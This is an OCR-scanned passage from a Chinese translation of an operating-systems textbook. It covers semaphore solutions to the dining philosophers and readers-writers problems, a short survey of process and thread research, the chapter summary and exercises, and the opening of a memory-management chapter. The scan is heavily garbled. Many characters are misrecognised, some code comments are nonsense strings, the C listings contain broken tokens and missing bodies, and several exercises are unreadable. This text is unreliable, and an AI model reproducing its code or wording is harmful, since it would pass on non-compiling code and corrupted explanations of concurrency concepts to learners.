应 用 中 ， 人 们 硕 望 有 一 种 能 够 始终 工作 的 方案 ， 它 不 能 因为 一 串 不 可 
靠 的 随机 数字 而 导致 失败 〈 想 象 一 下 核电 站 中 的 安全 控制 系统 ) 。 


对 图 2-45 中 的 算法 可 做 如 下 改进 ， 它 既 不 会 发 生死 锁 叉 不 会 产生 饥 
R: 使 用 一 个 二 元 信号 量 对 调用 think 之 后 的 五 个 语句 进行 保护 。 在 开 
从 拿 义 子 之 前 ， 斩 学 家 先 对 互 不 量 mutex 执 行 down 操 作 。 在 放 回 又 子 
后 ， 他 再 对 mutex 执 行 up 操作 。 从 理论 上 讲 ， 这 种 解法 是 可 行 的 。 但 从 
实际 角度 来 看 ， 这 里 有 性 能 上 的 局 限 : 在 任何 一 时 刻 只 能 有 一 位 哲学 
家 进餐 。 而 五 把 又 子 实际 上 可 以 允许 两 位 哲学 家 同时 进餐 。 


a 
餐 、 思 考 还 是 饥饿 状态 (正在 试图 拿 义 子 ) 。 一 个 哲学 家 只 有 在 两 个 
邻居 都 没有 进餐 时 才 人 允许 进入 到 进餐 状态 。 第 i 个 哲学 家 的 邻居 则 由 安 
LEFT 和 RIGHT 定义 ， 换 言 之 ， 若 为 2， 则 LEET 为 1，RIGHT 为 3。 


#define N 5 

#define LEFT (i+N-1)%N 
#define RIGHT (i+1)%N 
#define THINKING 0 

#define HUNGRY 1 

#define EATING 2 

typedef int semaphore; 

int state[N]; 

semaphore mutex = 1; 
semaphore s[N]; 


void philosopher(int i) 


iii (TRUE) { 


} 


void take_forks(int i) 

{ 
down(&mutex); 
state[i] = HUNGRY; 
test(i); 
up(&mutex); 
down(&s[i]); 

} 


void put_forks(i) 

{ 
down(&mutex); 
state[i] = THINKING; 
test(LEFT); 
test(RIGHT); 
up(&mutex); 

} 


void test(i) 


* OAH * 
i 的 左 邻 居 编 号 */ 
a MA 邻居 编号 */ 
fe # ae RTE E H He */ 
P 哲学 家 试图 全 起 又 子 */ 
1 哲学 家 进餐 #/ 
/* MGR DE MELE * 
k ABR —Ma Se */ 
Ii: 哲学 家 编号 ， 从 0 到 N=- 1 */ 


/* FCP TE */ 


s = 


is 哲学 家 编号 ， 从 0 到 N- 1 */ 
/* BEAM ARE */ 

/* 记录 哲学 家 ji 处 于 饥饿 的 状态 */ 
/* 党 试 获取 2 把 叉子 */ 

/* 离开 临界 区 */ 
/* 如 果 得 不 到 需要 的 叉子 则 阻塞 */ 


家 编号 Ts 从 0 到 N 


AF 2 
K- 学 


/* i: —1*/ 
进入 临界 区 */ 

as Be tee Be LA alt BE Se EG */ 

/# 检查 左边 的 邻居 现在 可 以 吃 吗 */ 

/* 检查 右边 的 邻居 现在 可 以 吃 吗 */ 

/* 离开 临界 区 */ 


/* is 


哲学 家 编号 ， 从 0 到 N- 1 */ 


哲学 家 的 状态 */ 


if (stateli] == HUNGRY && state[LEFT] != EATING && state[RIGHT] != EATING) { 


state[i] = EATING; 
up(&s[i]); 


Al 2-46 哲学 家 就 餐 问 题 的 一 个 解法 


该 程序 使 用 了 一 个 信号 量 数组 ， 每 个 信号 量 对 
样 在 所 需 的 又 子 被 占用 时 ， 


想 进 


进餐 的 哲学 家 束 被 阻塞 。 注 


程 将 过 程 philosopher 作 为 主 代码 运行 ， 而 其 他 过 程 take_forks ` put_forks 
和 test 只 是 普通 的 过 程 ， 而 非 单独 的 进程 。 


2.5.2 ”读者 - 写 者 问题 


哲学 家 束 餐 问题 对 于 互 不 访问 有 限 资源 的 竞争 问题 〈( 如 MO 设备 ) 

一 类 的 建 模 过 程 十 分 有 用 。 男 一 个 著名 的 问题 是 读者 - 写 者 问题 

(Courtois A, 1971) ， 它 为 数据 库 访 问 建立 了 一 个 模型 。 例 如 ， 设 
想 一 个 飞机 订 票 系统 ， 其 中 有 许多 苋 争 的 进程 试图 读 写 其 中 的 数据 。 
多 个 进程 同时 读数 据 库 是 可 以 接受 的 ， 但 如 采 一 个 进程 正在 更 新 

( 写 ) 数据 库 ， 则 所 有 的 其 他 进程 都 不 能 访问 该 数据 库 ， 即 使 读 操作 
也 不 行 。 这 里 的 问题 是 如 何 对 读者 和 写 者 进行 编程 ? 图 2-47 给 出 了 一 种 
解法 。 


typedef int semaphore; 此 运用 你 的 想象 */ 

semaphore mutex = 1; 诺 控制 对 rc 的 访问 */ 

semaphore db = 1; 1 控制 对 数据 库 的 访问 */ 

int rc = 0; /* 正在 读 或 者 即将 读 的 进程 数目 */ 


void reader(void) 


while (TRUE) { 1* ERII */ 
down(&mutex); 上/ 获得 对 rc 的 互 斥 访问 权 */ 
rc=rc+ 1; /* 现在 又 多 了 一 hs Me 
if (rc == 1) down(&db); /* WRX ER 
up(&mutex); /* 释放 对 re 的 Ri 访 oe */ 
read_data_base( ); /* 访问 数据 */ 
down(&mutex); /* 获取 对 rc 的 互 斥 访问 */ 
rc=rc—1; /* 现在 减少 了 一 个 读者 */ 
if (rc == 0) up(&db); /# 如 果 这 是 最 后 一 个 读者 …… * 
up(&mutex); 1 FE BOM reh ALAR Uy ial */ 
use_data_read(); /* 非 临 界 区 */ 


void writer(void) 


j /* 无 限 循环 */ 
Witte TRUE) $ * 非 临界 区 */ 
think_up_datat); 六 获取 互 斥 访问 */ 
ee /* 更 新 数据 */ 
write_data_base(); 六 释放 互 斥 访 问 */ 
up(&db); Sane 


图 2-47 读者- 写 着 问题 的 一 种 解法 


在 该 解法 中 ， 第 一 个 读者 对 信号 量 db 执 行 down 操 作 。 随 后 的 读者 
只 是 递增 一 个 计数 器 rc。 当 读者 离开 时 ， 它 们 递减 这 个 计数 器 ， 而 最 后 
一 个 读者 则 对 信号 量 执行 Wp， 这 样 就 多 许 一 个 被 阻塞 的 写 者 (如 果 存 
在 的 话 ) 可 以 访问 该 数据 库 。 


在 该 解法 中 ， 隐 含 着 一 个 需要 注解 的 条 件 。 假 设 一 个 读者 正 使 用 
数据 库 ， 另 一 个 读者 来 了 。 同 时 有 两 个 读者 并 不 存在 问题 ， 第 二 个 读 
者 补 人 允许 进入 。 如 采 有 第 三 个 和 更 多 的 读者 来 了 也 同样 多 许 。 


现在 ， 假 设 一 个 写 着 到 来 。 由 于 写 着 的 访问 是 排他 的 ， 不 能 允许 
写 者 进入 数据 库 ， 只 能 被 挂 起 。 只 要 还 有 一 个 读 着 在 活动 ， 束 允许 后 
续 的 读者 进来 。 这 种 生 略 的 结 采 是， 如 采 有 一 个 稳定 的 读者 流 存在 ， 
那么 这 些 读 着 将 在 到 达 后 被 允许 进入 。 而 写 考 融 始 终 被 挂 起 ， 直 到 没 
有 读者 为 止 。 如 果 来 了 新 的 读者 ， 比 如 ， 每 2 秒 钟 一 个 ， 而 每 个 读者 花 
费 5 秒 钟 完 成 其 工作 ， 那 么 写 者 束 永 远 没 有 机 会 了 。 


为 了 避免 这 种 情形 ， 可 以 稍微 改变 一 下 程序 的 写法 : 在 一 个 读者 
到 达 ， 且 一 个 写 者 在 等 待 时 ， 读 者 在 写 者 之 后 被 挂 起 ， 而 不 是 立即 多 
许 进 入 。 用 这 种 方式 ， 在 一 个 写 者 到 达 时 如 采 有 正在 工作 的 读者 ， 那 
么 该 写 着 只 要 等 竺 这 个 读者 完成 ， 而 不 必 等 候 其 后 面 到 来 的 读者 。 该 
解决 方案 的 缺点 是 ， 并 发 度 和 效率 较 低 。Courtois 等 人 给 出 了 一 个 写 者 
优先 的 解法 。 详 细 内 容 请 参阅 他 的 论文 。 


2.6 有关 进 程 和 线程 的 研究 


在 第 1 章 里 ， 我 们 介绍 了 有 关 操 作 系 统 结构 的 当前 研究 工作 。 在 本 
章 和 下 一 章 里 ， 我 们 将 更 专注 于 有 关 进 程 的 研究 。 随 着 时 间 推 移 ， 一 
些 问 题 会 比 其 他 问题 解决 得 更 好 。 多 数 研 究 倾 向 于 从 事 新 的 课题 ， 而 
不 征 围 绕 着 有 数 十 年 历史 的 题目 进行 研究 。 


作为 一 个 例子 ， 关 于 进程 概念 的 研究 已 经 获得 民 好 的 解决 方 梁 。 
几乎 所 有 的 系统 都 把 一 个 进程 视 为 一 个 容器 ， 该 容器 用 以 聚集 相关 的 
资源 ， 如 地 址 空间 、 线 程 、 打 开 的 文件 、 保 护 许可 等 。 不 同 的 系统 案 
集资 源 的 方式 略 有 差别 ， 但 是 差别 仅 在 于 工程 处 理 方面 。 基 本 思想 不 
会 有 较 大 的 争议 ， 且 有 关 进 程 的 课题 也 几乎 没有 新 的 研究 在 进行 。 


线程 是 比 进程 更 新 的 概念 ， 但 是 它们 同样 也 经 过 了 相当 多 的 考 
虚 。 仍 然 偶 尔 会 出 现 关 于 线程 的 论文 ， 例 如， 关于 在 多 处 理 器 上 的 线 
程 集群 (Tam 等 人 ，2007) 或 是 一 个 进程 中 的 线程 数量 如 何 扩展 到 100 
000 (Von Behren 等 人 ，2003) 。 


现在 ， 进 程 同步 问题 已 经 相当 成 熟 和 固定 ， 但 是 每 隔 一 段 时 间 还 
是 会 有 一 篇 论文 ， 例 如 关于 无 锁 并 发 处 理 的 问题 (Fraser 和 Harris， 
2007) 或 是 实时 系统 中 的 无 阻塞 同步 问题 (Hohmuth 和 Haertig， 
2001) 。 


调度 (SAAD as Ze ee) 还 是 一 些 人 研究 者 感 兴 趣 的 话题 。 
些 正 在 研究 的 主题 包括 移动 设备 上 的 能 耗 节省 调度 (Yuan 和 
Nahrstedt, 2006) 、 超 线程 级 调度 (Bulpin 和 Pratt，2005) ` 4CPU2 
闲 时 该 做 什么 (Eggert 和 Touch，2005) 以 及 虚拟 时 间 调 度 (Nieh 等 
人 ，2001) 。 但 是 ， 很 少 有 实际 系统 的 设计 者 会 因为 缺乏 像样 的 线程 
调度 算法 而 整 天 苦恼 ， 所 以 这 似乎 是 一 个 由 研究 者 推动 而 不 是 需求 推 
动 的 研究 类 型 。 总 而 言 之 ， 进 程 、 线 程 与 调度 不 像 它们 曾经 那样 ， 是 
研究 的 热点 。 这 些 研究 已 经 前 进 得 很 多 了 。 
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为 了 隐蔽 中 断 的 影响 ， 操 作 系统 提供 了 一 个 由 并 行 运行 的 顺序 进 
程 组 成 的 概念 模型 。 进 程 可 以 动态 地 创建 和 终止 。 每 个 进程 都 有 目 己 
的 地 址 空间 。 


对 于 某 些 应 用 而 言 ， 在 一 个 进程 中 使 用 多 个 控制 线程 是 有 益 的 。 
这 些 线 程 被 独立 调度 ， 每 个 线程 有 目 己 的 堆栈 ， 但 是 在 一 个 进程 中 的 
所 有 线程 共享 一 个 公共 地 址 空间 。 线 程 可 以 在 用 户 空间 或 内 核 中 实 
现 。 


进程 之 间 通 过 进程 间 通 信 原 语 彼 此 通信 ， 如 信号 量 、 管 程 或 消 
思 。 这 些 原 语 用 来 确保 同一 时 刻 不 会 有 两 个 进程 在 临界 区 中 ， 免 除了 
出 现 混 乱 的 情形 。 进 程 可 以 处 在 运行 、 可 运行 或 阻塞 状态 ， 并 且 在 该 
进程 或 其 他 进程 执行 某 个 进程 间 通 信 原 语 时 ， 可 以 改变 其 状态 。 线 程 
间 通 信也 走 类 似 的 。 


进程 间 通 信和 诛 语 可 以 用 来 解决 诸如 生产 者 -消费 者 问题 、 哲 学 家 职 
餐 问 题 和 读者 - 写 者 问题 等 。 即 便 有 了 这 些 原 语 ， 也 要 仔细 设计 以 避免 
出 错 和 和 死 锁 。 


已 经 有 一 大 批 研 究 出 来 的 调度 算法 。 某 些 算法 主要 用 于 批 处 理 系 
统 中 ， 如 最 短 作 业 优 先 调 度 算法 。 其 他 算法 常用 在 批 处 理 系 统 和 交互 


式 系统 中 ， 它 们 包括 轮转 调度 、 优 先 级 调度 、 多 级 队列 、 保 证 调度 、 
彩票 调度 以 及 公平 分 亨 调 度 等 。 有 些 系统 将 调度 策略 和 调度 机 制 清 晰 
地 分 离 ， 这 样 可 以 使 用 户 对 调度 算法 进行 控制 。 


习题 


1. 图 2-2 中 给 出 了 三 个 进程 状态 。 在 理论 上 ， 三 个 状态 可 以 有 六 种 
转换 ， 每 个 状态 两 个 。 但 是 ， 图 中 只 给 出 了 四 种 转换 。 有 没有 可 能 发 
生 其 他 两 种 转换 中 的 一 个 或 两 个 ? 


2. 假 设 要 设计 一 种 先进 的 计算 机 体系 结构 ， 它 使 用 硬件 而 不 古 中 
断 来 完成 进程 切换 。CPU 需 要 哪些 信息 ? 请 描述 用 硬件 完成 进程 切换 
的 工作 过 程 。 


3. 在 所 有 当代 计算 机 中 ， 至 少 有 部 分 中 断 处 理 程序 古 用 汇编 语言 
编写 的 。 为 什么 ? 


4. 当 中 断 或 系统 调用 把 控制 转 给 操作 系统 时 ， 通 疝 将 内 核 堆 栈 和 
被 中 断 进程 的 运行 堆栈 分 离 。 为 什么 ? 


5. 多 个 作业 能 够 并 行 运行 ， 比 它们 顺序 执行 完成 的 要 快 。 假 设 有 
两 个 作业 同时 开始 执行 ， 每 个 需要 10 分 钟 的 CPU 时 间 。 如 有 果 顺 序 执 
行 ， 那 么 最 后 一 个 作业 需要 多 长 时 间 可 以 完成 ”如 果 并 行 执行 又 需要 
多 长 时 间 ? 假设 IO 等 待 占 50% © 


6. 在 本 章 中 说 明 的 图 2-11a 的 模式 不 适合 用 于 使 用 内 存 高 速 缓存 的 
文件 服务 器 。 为 什么 不 适合 ? 每 个 进程 可 以 有 目 己 的 高 速 缓存 吗 ? 


7. 如 采 创 建 一 个 多 线程 进程 ， 寿 子 进程 得 到 全 部 父 进 程 线 程 的 副 
本 ， 会 出 现 问题 。 假 如 原 有 线程 之 一 正在 等 待 键盘 输入 ， 现 在 则 成 为 
两 个 线程 在 等 待 键盘 和 输入， 每 个 进程 有 一 个 。 在 单线 程 进程 中 也 会 发 
生 这 种 问题 吗 ? 


8. 在 图 2-8 中 ， 给 出 了 一 个 多 线程 Web 服 务 器 。 如 果 读 取 文 件 的 惟 
一 途径 是 正常 的 阻塞 read 系 统 调用 ， 那 么 Web 服 务 器 应 该 使 用 用 户 级 线 
程 还 是 内 核 级 线程 ? 为 什么 ? 


9. 在 本 章 中 ， 我 们 介绍 了 多 线程 Web 服 务 器 ， 说 明 它 比 单线 程 服 
务 器 和 有 限 状 态 机 服务 絮 更 好 的 原因 。 存 在 单线 程 服务 右 更 好 一 些 的 
TENS? 请 给 出 一 个 例子 。 


J 


10. 在 图 2-12 中 寄存 器 集合 按 每 个 线程 中 的 内 容 列 出 而 不 是 按 每 个 
进程 中 的 内 容 列 出 。 为 什么 ? 毕 竞 机 器 只 有 一 套 寄 存 器 。 


11. 为 什么 线程 要 通过 调用 thread_yield 目 愿 放 弃 CPU? FER, HAT 
没有 周期 性 的 时 钟 中 断 ， 线 程 可 以 不 交 回 CPU e 


12. 线 程 可 以 被 时 钟 中 断 抢 占 吗 ? 如 宁可 以 ， 什 么 情形 下 可 以 ? 如 
果 不 可 以 ， 为 什么 不 可 以 ? 


13. 在 本 习题 中 ， 要 求 对 使 用 单线 程 文 件 服务 器 和 多 线程 文件 服务 
堪 读 取 文 件 进行 比较 。 假 设 所 需要 的 数据 都 在 块 高 速 缓存 中 ， 人 花费 


15ms 获 得 工作 请 求 ， 分 派 工作 ， 并 处 理 其 余 必 要 工作 。 如 采 在 三 分 之 
一 时 间 时 ， 需 要 一 个 磁盘 操作 ， 要 另外 花费 75ms， 此 时 该 线程 进入 睡 
眠 。 在 单线 程 情形 下 服务 需 每 秒 钟 可 以 处 理 多 少 个 请 求 ? 如 果 是 多 线 
程 呢 ? 


14. 在 用 户 空间 实现 线程 ， 其 最 大 的 优点 是 什么 ? 最 大 的 缺点 是 什 


Ds 


15. 在 图 2-15 中 创建 线程 和 线程 打印 消 轧 是 随机 交织 在 一 起 的 。 有 
没有 方法 可 以 严格 按照 以 下 次 序 运 行 : 创建 线程 1， 线 程 1 打印 消息 ， 
线程 1 结束 ;创建 线程 2， 线 程 2 打印 消 轧 ， 线 程 2 结束 ;以 此 类 推 。 如 
果 有 ， 和 是 什么 方法 ， 如 采 没 有 请 解释 原因 。 


16. 在 讨论 线程 中 的 全 局 变量 时 ， 曾 使 用 过 程 create_global 将 存储 
分 配给 指 癌变 量 的 指针 ， 而 不 是 变量 自身 。 这 是 必需 的 ， 还 是 由 于 该 
过 程 也 需要 使 用 这 些 值 ? 


17. 考 虑 线程 全 部 在 用 户 空 间 实现 的 一 个 系统 ， 其 中 运行 时 系统 每 
秒 钟 得 到 一 个 时 钟 中 断 。 假 设 在 该 运行 时 系统 中 ， 当 某 个 线程 正在 执 
行 时 发 生 一 个 时 钟 中 断 ， 此 时 会 出 现 什 么 问题 ? 你 有 什么 解决 该 问题 
的 建议 吗 ? 


18. 假 设 一 个 操作 系统 中 不 存在 类 似 于 select 的 系统 调用 来 提前 了 解 
在 从 文件 、 管 道 或 设备 中 读 取 时 是否 安全 ， 不 过 该 操作 系统 确实 允许 


设置 报警 时 钟 ， 以 便 中 断 阻 塞 的 系统 调用 。 在 上 述 条 件 下 ， 是 否 有 可 
能 在 用 户 空间 中 实现 一 个 线程 包 ? 请 加 以 讨论 。 


19. 在 2.3.4T 中 所 讨论 的 优先 级 反 转 问题 是 否 可 能 在 用 户 级 线程 中 
RESITA 


20.7£2.3.4 F, Hui VA EAER CB FEL 
WROL, SAT HAITA o ERARE E RIAM ce TE ICDA 
度 算 法 ， 还 会 发 生 同 样 问题 吗 ? 请 给 予 讨 论 。 


21 在 使 用 线程 的 系统 中 ， 若 使 用 用 户 级 线程 ， 是 每 个 线程 一 个 堆 
栈 还 是 每 个 进程 一 个 堆栈 ? 如 果 使 用 内 核 级 线程 情况 又 如 何 呢 ? 请 给 
予 解释 。 


22. 在 开发 计算 机 时 ， 通 党 首先 用 一 个 程序 模拟 ， 一 次 运行 一 条 指 
令 ， 甚 至 多 处 理 右 也 闫 格 按 此 模拟 。 在 类 似 于 这 种 没有 同时 事件 发 生 
的 情形 下 ， 会 出 现 苋 争 条 件 吗 ? 


23. 两 个 进程 在 一 个 共享 存储 器 多 处 理 器 ( 即 两 个 CPU) 上 运行 ， 
当 它们 要 共享 一 个 公共 内 存 时 ， 图 2-23 所 示 的 采用 变量 turn 的 忙 等 等 解 
决 方案 还 有 效 吗 ? 


24. 在 进程 调度 是 抢占 式 的 情形 下 ， 图 2-24 中 展示 的 互 不 问题 的 
Peterson 解 法 能 正常 工作 吗 ? 如 果 是 非 抢占 式 的 情况 呢 ? 


一 个 可 以 屏蔽 中 断 的 操作 系统 如 何 实现 信号 量 的 框架 。 


25. 给 
26. 请 说 明 计数 信号 量 〈 即 可 以 保持 一 个 任意 值 的 信号 量 ) 如 何 仅 


元 信号 量 和 普通 机 器 指令 实现 。 


27. 如 采 一 个 系统 只 有 两 个 进程 ， 可 以 使 用 一 个 屏障 来 同步 这 两 个 


进程 吗 ? 为 什么 ? 


言 号 量 对 同一 个 进程 中 


28. 如 采 线 程 在 内 核 中 实现 ， 可 以 使 用 内 核 
的 两 个 线程 进行 同步 吗 ? 如 采 线 程 在 用 户 空间 实现 呢 ? 假设 在 其 他 进 


程 中 没有 线程 必须 访问 该 信号 量 。 请 讨论 你 的 答案 


29. 管 程 内 的 同步 机 制 使 用 条 件 变量 和 两 个 特殊 操作 wait 和 signal ° 
条 原 语 waituntil， 它 以 任意 的 布尔 谓 


一 种 更 通用 的 同步 形式 是 只 用 一 条 
词 作 为 参数 。 例 如 


waituntil x<0 or y+z<n 


这 样 束 不 再 需要 signal 原 语 。 很 显然 这 一 方式 比 Hoare 或 Brinch 
Hansen 方 案 更 通用 ， 但 它 从 未 被 采用 过 。 为 什么 ? 提示 : 请 考虑 其 实 


现 。 


30. 一 个 快餐 店 有 四 类 雇员 : 
(2) 厨师 ， 准 备 饭菜 ;， (3) HEIL, RRR TH, 


(1) 领班 ， 接 收 顾 客 点 的 荣 单 ; 
(4) 收银 


〖， 将 食品 袋 区 给 顾客 并 收 钱 。 每 个 雇员 可 被 看 作 一 个 进行 通信 的 顺 
序 进 程 。 它 们 采用 的 进程 间 通 信 方 式 是 什么 ? 请 将 这 个 模型 与 UNIX 中 
进程 联系 起 来 。 


sil 


31 RIA ME ERRATA MCA, SERA SBM 
空 信 箱 收 请 轧 时 ， 进 程 都 不 会 阻塞 ， 相 反 ， 会 得 到 一 个 错误 代码 。 进 
程 啊 应 错误 代码 的 处 理 方 式 为 一 抽 一 裔 地 重 试 ， 直 到 成 功 为 止 。 这 种 
TAR SBP RIS? 


32.CDC 6600711 ENUE FA PRERE E a FE HE OPS id BE 
算法 ， 它 可 以 同时 处 理 多 达 10 个 IO 进程 。 每 条 指令 结束 后 都 进行 进程 
切换 ， 这 样 进程 1 执行 指令 1， 进 程 2 执行 指令 2， 以 此 类 推 。 进 程 切换 
由 特殊 硬件 完成 ， 所 以 没有 开销 。 如 果 在 没有 竞争 的 条 件 下 一 个 进程 
需要 T 秒 钟 完成 ， 那 么 当 有 n 个 进程 共享 处 理 器 时 完成 一 个 进程 需要 多 
长 时 间 ? 


33. 和 是 否 可 以 通过 分 析 源 代码 来 确定 进程 症 CPU 密集 型 的 还 是 7O 窗 
集 型 的 ? 如 何 能 在 运行 时 刻 进行 此 项 决定 ? 


34. 在 “ 何 时 调度 ”一 节 中 曾 提 到 ， 有 了 时 一 个 重要 进程 可 以 在 选择 下 
一 个 被 阻塞 进程 进入 运行 的 过 程 中 发 挥 作用 ， 从 而 改善 调度 性 能 。 请 
给 出 可 以 这 样 做 的 情形 并 解释 如 何 做 。 


35. 对 某 系 统 进行 监测 后 表明 ， 当 阻塞 在 WO 之 前 时 ， 平 均 每 个 进 
程 运行 时 间 为 T°。 一 次 进程 切换 需要 的 时 间 为 S$， 这 里 S 实 际 上 就 是 开 
销 。 对 于 采用 时 间 片 长 度 为 Q 的 轮转 调度 ， 请 给 出 以 下 各 种 情况 中 
CPU 利用 率 的 计算 公式 : 


a)Q=00 
b)Q>T 
c)S<Q<T 
d)Q=S 
e)Q 趋 近 于 0 


36. 有 5 个 待 运行 作业 ， 佑 计 它 们 的 运行 时 间 分 别 是 9，6，3，5 和 
X。 采 用 哪 种 次 序 运 行 这 些 作业 将 得 到 最 短 的 平均 啊 应 时 间 ? (答案 
将 依赖 于 X。) 


37. 有 5 个 批 处 理 作业 A 到 E， 它 们 几乎 同时 a 到达 一 个 计算 中 心 。 估 
计 它 们 的 运行 时 间 分 别 为 10，6，2，4 和 8 分 钟 。 其 优先 级 (由 外 部 设 
定 ) 分 别 为 3，5，2，1 和 4， 其 中 5 为 最 高 优先 级 。 对 于 下 列 每 种 调度 
算法 ， 计 算 其 平均 进程 周转 时 间 ， 可 忽略 进程 切换 的 开销 。 


a) 轮 转 法 。 


b) 优 先 级 调度 。 
c) 先 来 先 服务 (按照 0，6，2，4，8 次 序 运行 ) 


dd) 最 短 作业 优先 。 


对 a)， 假 设 系 统 具 有 多 道 程序 处 理 能 力 ， 每 个 作业 均 公 平 共 享 
CPU 了 时间， 对 b) 到 d)， 假 设 任 一 时 刻 只 有 一 个 作业 运行 ， 直 到 结束 。 
所 有 的 作业 都 完全 是 CPU 密集 型 作业 。 


38. 运 行 在 CTSS 上 的 一 个 进程 需要 30 个 时 间 片 完成 。 该 进程 必须 
被 调 入 多 少 次 ， 包 括 第 一 次 (在 该 进程 运行 之 前 ) ? 

39. 能 找到 一 个 使 CTSS 优 先 级 系统 不 受 随 机 回 车 链 电 和 弄 的 方法 
ja? 


40.a=1/2 的 老化 算法 用 来 预测 运行 时 间 。 先 前 的 四 次 运行 ， 从 最 老 
的 一 个 到 最 近 的 一 个 ， 其 运行 时 间 分 别 是 40ms，20ms，40ms 和 


15ms。 下 一 次 的 预测 时 间 有 是 多 少 ? 


41. 一 个 软 实时 系统 有 4 个 周期 时 间 ， 其 周期 分 别 为 50ms， 
100ms，200ms 和 250ms。 假设 这 4 个 事件 分 别 需 要 35ms，20ms，10ms 
和 x ms 的 CPU 时 间 。 保 持 系统 可 调度 的 最 大 x 值 是 多 少 ? 


42. 请 解释 为 什么 两 级 调度 比较 常用 。 


43. 一 个 实时 系统 需要 处 理 两 个 语音 通信 ， 每 个 运行 5ms， 然 后 每 
次 突 发 消耗 1ms CPU 时 间 ， 加 上 25 帧 / 秒 的 一 个 视频 ， 每 一 帧 需要 20mas 


的 CPU 时 间 。 这 个 系统 是 可 调度 的 吗 ? 


44. 考 虑 一 个 系统 ， 在 这 个 系统 中 为 了 内 核 线程 调度 布 望 将 策略 和 
机 制 分 离 。 请 提出 一 个 实现 此 目标 的 手段 。 


45. 在 哲学 家 就 餐 问 题 的 解法 (图 2-46) 中 ， 为 什么 在 过 程 
take_forks 中 将 状态 变量 置 为 HUNGRY? 


46. 考 虑 图 2-46 中 的 过 程 put_forks， 假 设 变 量 state[ 订 在 对 test 的 两 次 
调用 之 后 而 不 是 之 前 被 置 为 THINKING“。 这 个 改动 会 对 解法 有 什么 影 
Aja)? 


47. 按 照 哪 一 类 进程 何 时 开始 ， 读 者 - 写 者 问题 可 以 有 者 干 种 方式 
求解 。 请 详细 描述 该 问题 的 三 种 变 体 ， 每 一 种 变 体 偏好 (或 不 偏好 ) 
某 一 类 进程 。 对 每 种 变 体 ， 请 指出 当 一 个 读者 或 写 者 访问 数据 库 时 会 
发 生 什 么 ， 以 及 当 一 个 进程 结束 对 数据 库 的 访问 后 又 会 发 生 什么 ? 


48. 请 编写 一 个 shell 脚 本 ， 通 过 读 取 文件 的 最 后 一 个 数字 ， 对 之 加 
1， 然 后 再 将 该 数字 附 在 该 文件 上 ， 从 而 生成 顺序 数 文件 。 在 后 台 和 前 
台 分 别 运 行 该 脚本 的 一 个 实例 ， 每 个 实例 访问 相同 的 文件 。 需 要 多 长 
时 间 才 出 现 竞 争 条 件 ? 临界 区 是 什么 ? 请 修改 该 脚本 以 避免 竞争 ( 提 
示 : 使 用 mn file file.lock 锁 住 数据 文件 。) 


49. 假 设 有 一 个 提供 信号 量 的 操作 系统 。 请 实现 一 个 消息 系统 ， 编 


写 发 送 和 接收 消 轧 的 过 程 。 


50. 使 用 管 程 而 不 古 信 与 量 来 解决 哲学 家 束 餐 问题 。 


51. 假 设 一 个 大 学 为 了 卖弄 其 政治 上 的 正确 性 ， 准 备 把 美国 最 高 法 
院 的 信条 “平等 但 隔离 其 本 身 就 是 不 平等 (Separate but equal is 
inherently unequal) ” 既 运 用 在 种 族 上 也 运 在 性 别 上 ， 从 而 结束 校园 内 
长 期 使 用 的 浴室 按 性 别 隔离 的 做 法 。 但 是 ， 为 了 迁 束 传统 习惯 ， 学 校 
颁布 法 令 ， 当 有 一 个 女生 在 浴室 里 ， 那 么 其 他 女生 可 以 进入 ,但 是 男 
EMT, LIA ES TARM IER NESTE ST, FRA 
前 处 于 以 下 三 种 可 能 状态 之 一 : 


用 你 偏好 的 程序 设计 语言 编写 下 面 的 过 程 : 
woman_ wants_to_enter, man wants_to_enter, woman_leaves, 


man_leaves。 可 以 随意 采用 所 希望 的 计数 咽 和 同步 技术 。 


52. 重 写 图 2-23 中 的 程序 ， 以 便 能 够 处 理 两 个 以 上 的 进程 。 


53. 编 写 一 个 使 用 线程 并 共享 一 个 公共 缓冲 区 的 生产 者 -消费 者 问 
题 。 但 是 ， 不 要 使 用 信号 量 或 任何 其 他 用 来 保护 共享 数据 结构 的 同步 
原 语 。 直 接 让 每 个 线程 在 需要 访问 时 就 访问 。 使 用 sleep 和 wakeup 来 处 
理 满 和 空 的 条 件 。 观 察 需要 多 长 时 间 会 出 现 严 重 的 竞争 条 件 。 例 如 ， 
可 以 让 生产 者 一 会 儿 打印 一 个 数字 ， 每 分 钟 打 印 不 要 超过 一 个 数字 ， 
因为 IO 会 影响 竞争 条 件 。 


第 3 章 ”存储 管理 


A (RAM) 是 计算 机 中 一 种 需要 认真 管理 的 重要 资源 。 束 目前 
来 说 ， 虽 然 一 台 普 通 家 用 计算 机 的 内 存 容量 已 经 是 20 世 纪 60 年 代 早 期 
全 球 最 大 的 计算 机 IBM 7094 的 内 存 容量 的 10 000 倍 以 上 ， 但 是 程序 大 
小 的 增长 速度 比 内 存 容量 的 增长 速度 要 快 得 多 。 正 如 由 金森 定律 所 指 
出 的 : “不 管 存 储 器 有 多 大 ， 程 序 都 可 以 把 它 填 满 ”。 在 这 一 章 中 ， 我 
们 将 讨论 操作 系统 是 怎样 对 内 存 创建 抽象 模型 以 及 怎样 管理 内 存 的 。 


每 个 程序 员 都 梦想 拥有 这 样 的 内 存 ， 它 是 私有 的 、 容 量 无 限 大 
的 、 速 度 无 限 快 的 ， 并 且 是 永久 性 的 存储 器 ( 即 断 电 时 不 会 丢失 数 
据 ) 。 当 我 们 期 望 这 样 的 内 存 时 ， 何 不 进一步 要 求 它 价格 低廉 呢 ? i 
憾 的 是 ， 目 前 的 技术 还 不 能 为 我 们 提供 这 样 的 内 存 。 也 许 你 会 有 解决 


方案 。 


除 此 之 外 的 选择 是 什么 呢 ? 经 过 多 年 探索 ， 人 们 提出 了 “分 层 存储 
ará” (memory hierarchy) 的 概念 ， 即 在 这 个 体系 中 ， 计 算 机 有 若干 
Jk (MB) 快速 、 昂 贵 且 易 失 性 的 高 速 缓存 (cache) ， 数 千 兆 (GB) 
速度 与 价格 适中 且 同 样 易 失 性 的 内 存 ， 以 及 几 兆 兆 (TB) RE ` BE 
价 、 非 易 失 性 的 磁盘 存储 ， 另 外 还 有 诸如 DVD 和 USB 等 可 移动 存储 大 
置 。 操 作 系 统 的 工作 是 将 这 个 存储 体系 抽象 为 一 个 有 用 的 模型 并 管理 
这 个 抽象 模型 。 


操作 系统 中 管理 分 层 存储 器 体系 的 部 分 称 为 存储 管理 器 (memory 
manager) 。 它 的 任务 是 有 效 地 管理 内 存 ， 即 记录 哪些 内 存 是 正在 使 用 
